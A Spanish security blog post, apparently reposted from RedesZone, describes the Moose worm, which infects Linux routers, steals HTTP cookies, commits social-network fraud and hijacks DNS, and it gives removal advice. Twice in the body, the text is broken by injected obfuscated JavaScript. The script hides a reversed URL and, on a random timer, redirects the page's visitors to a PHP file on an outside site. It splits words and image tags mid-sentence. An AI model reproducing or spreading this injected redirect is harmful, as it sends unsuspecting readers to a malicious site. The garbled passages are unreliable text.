MOOSE : un gusano que ataca routers y dispositivos Linux
Aunque no es muy habitual ver malware instalado en routers, nunca debemos olvidar que estos dispositivos de red son los que más datos controlan, desde las webs que visitamos hasta todos los credenciales que viajan desde nuestro PC al servidor remoto. Los investigadores de seguridad de We Live Security han estado investigando el funcionamiento de una nueva amenaza, Moose, creada especialmente para infectar routers basados en Linux alrededor de todo el mundo.
El principal objetivo del gusano Moose son los routers que funcionan con un sistema basado en el kernel de Linux (OpenWRT, DD-WRT, Tomato y muchos firmwares privativos de fabricantes) aunque también es capaz de infectar cualquier otro dispositivo que utilice un sistema operativo basado en Linux que pueda encontrar en su camino como smartphones, dispositivos DVR, ordenadores, cámaras IP, etc.
moose_linux
Moose se distribuye como un ejecutable convencional para Linux en forma de binario ELF. Este gusano crea automáticamente 36 procesos en los dispositivos que infecta. La mayoría de estos procesos están diseñados especialmente para infectar a otros dispositivos que se conecten a la misma red y poder tener así una mayor actividad.
Los procesos que no son utilizados para infectar otros equipos se centran principalmente en el robo de paquetes y cookies HTTP no cifradas que puedan contener información personal sobre los usuarios como datos bancarios, credenciales de acceso, etc. Este gusano también conecta con un servidor Proxy para visitar cuentas sociales o cargar vídeos de YouTube y otras plataformas y así obtener remuneración económica, aumentar el número de visitar y ganar protagonismo en estas redes sociales.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-655×303.png?x=634″ alt=”” width=”634″ height=”293″ /><br />
<strong>moose_funcionamien<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to
Las principales páginas sociales que carga este malware a través del proxy son:
Fotki
Instagram
Microsoft Live
Soundcloud
Twitter
Vine
Yahoo
YouTube
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-655×368.png?x=634″ alt=”” width=”634″ height=”356″ /><br />
Al día se pueden llegar a enviar más de 1500 solicitudes a las webs anteriores desde un router infectado. También secuestra las DNS del router y moni<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
toriza así todas las conexiones que el usuario genera y que intentan salir a Internet, registrándose todas ellas en el servidor remoto de control,
El malware analiza también la memoria del dispositivo infectado y es capaz de identificar y bloquear otras piezas de malware que puedan estar presentes en él de manera que garantice siempre el 100% de los recursos para él.
Cómo eliminar Moose de nuestro router y prevenir su infección
Si ya hemos sido infectados por este gusano lo más recomendable de momento es resetear la configuración y cambiar la contraseña de acceso lo antes posible, sin embargo, es posible que el gusano haya cambiado algún aspecto del firmware y siga estando presente. Si es posible también debemos borrar y reinstalar el firmware por completo para garantizar su eliminación.
Igualmente para evitar infectarnos debemos cambiar las contraseñas de nuestras principales redes sociales así como deshabilitar la administración remota del router a través de los protocolos SSH, Telnet, HTTP y HTTPS para que Moose no pueda comunicarse con su centro de control.
Ver informacion original al respecto en Fuente:
http://www.redeszone.net/2015/05/27/moose-un-gusano-que-ataca-routers-y-dispositivos-linux/
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.